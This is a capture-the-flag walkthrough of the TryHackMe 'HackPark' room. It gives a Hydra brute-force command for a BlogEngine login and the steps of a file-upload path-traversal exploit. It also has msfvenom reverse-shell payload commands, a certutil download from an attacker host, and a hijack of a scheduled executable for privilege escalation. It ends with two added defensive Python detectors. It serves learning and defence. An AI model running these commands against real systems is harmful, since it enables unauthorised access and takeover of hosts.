THM - HackPark

This walkthrough describes my approach to the 'Hackpark' room on TryHackMe. This room was more challenging than anticipated and required outside-the-box thinking to complete.

Scanning and enumeration

As usual, I began this machine by executing an Nmap scan. My first attempt at scanning suggested the machine wasn't alive on the network, but adding -Pn to disable host discovery resolved the issue.
From the scan we see two open TCP ports: an IIS server on port 80 and what appears to be RDP operating on port 3389. We also see from one of the default scripts run by the '-sC' flag that there is a webpage titled 'hackpark' on the web server.
Opening the web page we're greeted by a familiar image, Pennywise. Further enumeration of the page provides two additional clues that might help us gain access to the page.
The page also includes an Archive, which may provide usernames. Further examination reveals that there is only one user, but it still might pay off. We identify two versions of the username that we'll save for later: 'Adminstrator' and 'Admin'.

Establishing a foothold

Next, we turn our attention to the login page. Reviewing the page source (network tab) reveals that the page uses POST requests to complete login. Since we already have two possible usernames, we may be able to brute force the POST form with Hydra.
Setting up Hydra is fairly straightforward but requires additional information in order to brute force HTTP forms. The command should be formatted like the following:
hydra -l <username> -P <list location> <IP> http-post-form "<path>:<requestbody>:<fail verbiage>"
First, we create a list of the usernames discovered during enumeration. This is accomplished by creating a .txt file using your editor of choice. Be sure to include variations of the names you found.
Next, we return to Firefox to gather the additional required information. We use Firefox's built-in inspector tool to gather the information.
  1. Right click on the password field and select "inspect element."
  2. Select the "network" tab then attempt a login to generate a post request.
  3. Select the post request, then click the "resend" dropdown and select "edit and resend" to view the request.
  4. Capture the information contained in the "URL" and "Request Body Fields."
  5. Add the information to the payload and be sure to replace the user and password fields with ^USER^ and ^PASS^. The final payload should look like the following:
hydra -L Documents/usernames.txt -P /usr/share/wordlists/rockyou.txt 10.10.123.151 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=TOBW8QB2Q1bJrd7T7HsS3fWFCIZpV%2BSQtzBYlIkaU4ByFOGGPbsPj4DSWfzE76ESPJ%2FAixlw2qczi60QSYlOlWbeDdJH%2FPD%2Bk28%2FSXg39HjUlbJh5osYPtt3g%2B28B26yy20WoJhmTf2C%2B7SJ4obtCMSaedImhrhNSKEr1d1rG1P%2BMc%2FV&__EVENTVALIDATION=qArfCXjRgc%2FupGmTQg94iY45Zhm%2FDcY6J2yn04JGA7L7UV1KeIx2EZV3EyAJ6GJ2cRKddbCCFFdcKOVHxxqpRr%2FBzvfkGKtcTSrby02Ac%2FnFBimu3PdUoge83U%2BLHPH%2BRuMIPDkCO2ASIW7SouDvT4NmgE6A%2Fe1I4fhXybvPHiWF3i1N&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
We execute the command and within a few moments Hydra provides two sets of credentials.
We are able to successfully log in to BlogEngine using the credentials and begin enumeration. Under ‘About’ we find that this particular blog utilizes BlogEngine version 3.3.6.0. A quick Google search reveals an exploit for this version.
This exploit is fairly straightforward and simple to execute.
  1. Download the exploit to the attacking machine.
  2. Update the IP address to that of the attacking machine, and change the port (if desired).
  3. Start a Netcat listener on the attacking machine to catch the incoming connection.
  4. Return to BlogEngine and open the pre-existing post.
  5. Select the File icon and upload the exploit. Be sure to rename the file as ‘PostView.ascx’ prior to upload.
  6. Navigate to http://10.10.49.8/?theme=../../App_Data/files (update IP accordingly). If you’ve done everything correctly the page will hang and you’ll receive a reverse shell.
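Seen from the defending side, both the Hydra run against the login form and the ?theme= request in the last step leave distinctive lines in the IIS access log. The following is an added example, not part of the original walkthrough, that parses W3C-format log text and flags both. The sample log lines, the 60-second window and the threshold of 5 are assumptions chosen for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote

LOGIN_PATH = "/account/login.aspx"  # login form path from the Hydra command
WINDOW, THRESHOLD = timedelta(seconds=60), 5  # assumed tuning values
# Constructed sample in IIS W3C extended format (not captured from the room).
SAMPLE_LOG = "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status\n"
SAMPLE_LOG += "".join(
    f"2024-01-01 10:00:{s:02d} POST /Account/login.aspx ReturnURL=/admin/ 192.0.2.10 200\n"
    for s in range(1, 7))
SAMPLE_LOG += """\
2024-01-01 10:00:30 POST /Account/login.aspx ReturnURL=/admin/ 192.0.2.20 200
2024-01-01 10:05:00 POST /Account/login.aspx ReturnURL=/admin/ 192.0.2.20 302
2024-01-01 10:06:00 GET / theme=Standard 192.0.2.20 200
2024-01-01 10:07:00 GET / theme=../../App_Data/files 192.0.2.10 200
2024-01-01 10:07:05 GET / THEME=..%2F..%2FApp_Data%2Ffiles 192.0.2.10 200
"""

def parse_w3c(text):
    """Yield one dict per request, named by the log's own #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and len(line.split()) == len(fields):
            yield dict(zip(fields, line.split()))

def has_theme_traversal(query):
    """True if a theme parameter holds '..' after two rounds of URL-decoding."""
    return any(k.lower() == "theme" and ".." in unquote(v)
               for k, v in parse_qsl(query, keep_blank_values=True))

def detect(text):
    """Return (IPs with a login POST burst, traversal requests) for a W3C log."""
    recent, brute, traversal = defaultdict(deque), set(), []
    for r in parse_w3c(text):
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == LOGIN_PATH:
            q = recent[r["c-ip"]]
            q.append(ts)
            while ts - q[0] > WINDOW:  # drop attempts older than the window
                q.popleft()
            if len(q) >= THRESHOLD:
                brute.add(r["c-ip"])
        if has_theme_traversal(r["cs-uri-query"]):
            traversal.append((r["c-ip"], r["cs-uri-query"]))
    return brute, traversal
```

Calling detect(SAMPLE_LOG) returns the set of client IPs that exceeded the login threshold and a list of (client IP, query string) pairs for the traversal requests.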

Privilege Escalation (no Metasploit)

Before we begin enumerating for privilege escalation we need to upgrade to a fully interactive shell. The systeminfo command reveals that the target is running Windows Server 2012 R2 Standard, 64-bit. To upgrade the shell, we first generate a payload with MSFVenom using the following command.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe
Next, upload the payload to the target. On Windows I prefer setting up a SimpleHTTPServer on the attacking machine and downloading the desired file(s) using certutil on the target.
certutil -urlcache -f http://attackerip/shell.exe shell.exe
After uploading the payload to the target, start another Netcat listener on the attacking machine. Run the payload on the target and you'll receive a fully interactive shell.
Now we can turn our attention to escalating our privileges. We start by uploading WinPEAS, again with the assistance of the SimpleHTTPServer and certutil.
Running WinPEAS provides comprehensive results including several possible privilege escalation options. One that seems particularly interesting is a service called SystemScheduler. (Note: I made several unsuccessful attempts to exploit the available autologon credentials before moving on to this service)
Further examination of the SystemScheduler service turns up a privilege escalation exploit for it. Initial review of this exploit suggests it should work on this system; however, after several attempts it does not.
In fact, getting this exploit to work requires more enumeration. We know from WinPEAS that the service is present, and the service control command confirms that the service is running; however, the suggested service (wservice.exe) does not seem to be running on a schedule.
After a good bit of searching, I located the program's log files in C:\Program Files (x86)\SystemScheduler\Events. In the events directory is a file named '20198415519.INI_LOG.txt'. Viewing this file reveals that a different executable (Message.exe) is running at :00 and :33 of every minute!
Now that we've identified the correct executable, exploitation is simple.
  1. On the target machine, rename Message.exe to Message.bak.
  2. Create a new payload with MSFVenom and name it Message.exe.
  3. Start a Netcat listener on the attacking machine.
  4. Upload the payload and wait for the program to run.
  5. Root!
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe
The flags are located on the jeff and Administrator desktops.
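Renaming and replacing Message.exe is only possible because the low-privileged account can write to the directory of a program that the scheduler runs with higher privileges. The following is an added example, not part of the original walkthrough, that audits icacls output for that condition. The ACL entries in the sample are invented for illustration (the page does not show the real ACL), and the trusted-principal allow-list is an assumption.

```python
import re

# Principals expected to hold write access under Program Files (an assumed
# allow-list; extend it for your environment).
TRUSTED = {"nt authority\\system", "builtin\\administrators",
           "nt service\\trustedinstaller", "creator owner"}
# icacls rights that allow replacing or renaming a file in the directory:
# F full, M modify, W write, D delete, WD add file, AD add subdirectory,
# DC delete child, GA generic all, GW generic write.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "GA", "GW"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([A-Z,]+\))+)$")

# Directory named in the walkthrough; the ACL below is constructed sample data.
TARGET = r"C:\Program Files (x86)\SystemScheduler"
SAMPLE = TARGET + r""" NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
                                       BUILTIN\Users:(I)(OI)(CI)(RX)
                                       Everyone:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""

def risky_aces(output, path):
    """Return (principal, write rights) for untrusted principals that can write."""
    findings = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):  # first line carries the path
            line = line[len(path):].strip()
        m = ACE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        groups = re.findall(r"\(([A-Z,]+)\)", m["groups"])
        rights = {r for g in groups for r in g.split(",")} - INHERIT_FLAGS
        if rights & WRITE_RIGHTS and m["who"].lower() not in TRUSTED:
            findings.append((m["who"], sorted(rights & WRITE_RIGHTS)))
    return findings

if __name__ == "__main__":
    for who, rights in risky_aces(SAMPLE, TARGET):
        print(f"{TARGET}: {who} can write ({','.join(rights)})")
```

Any finding on a directory holding binaries that a service or scheduler runs as a privileged account is worth fixing by removing the write grant.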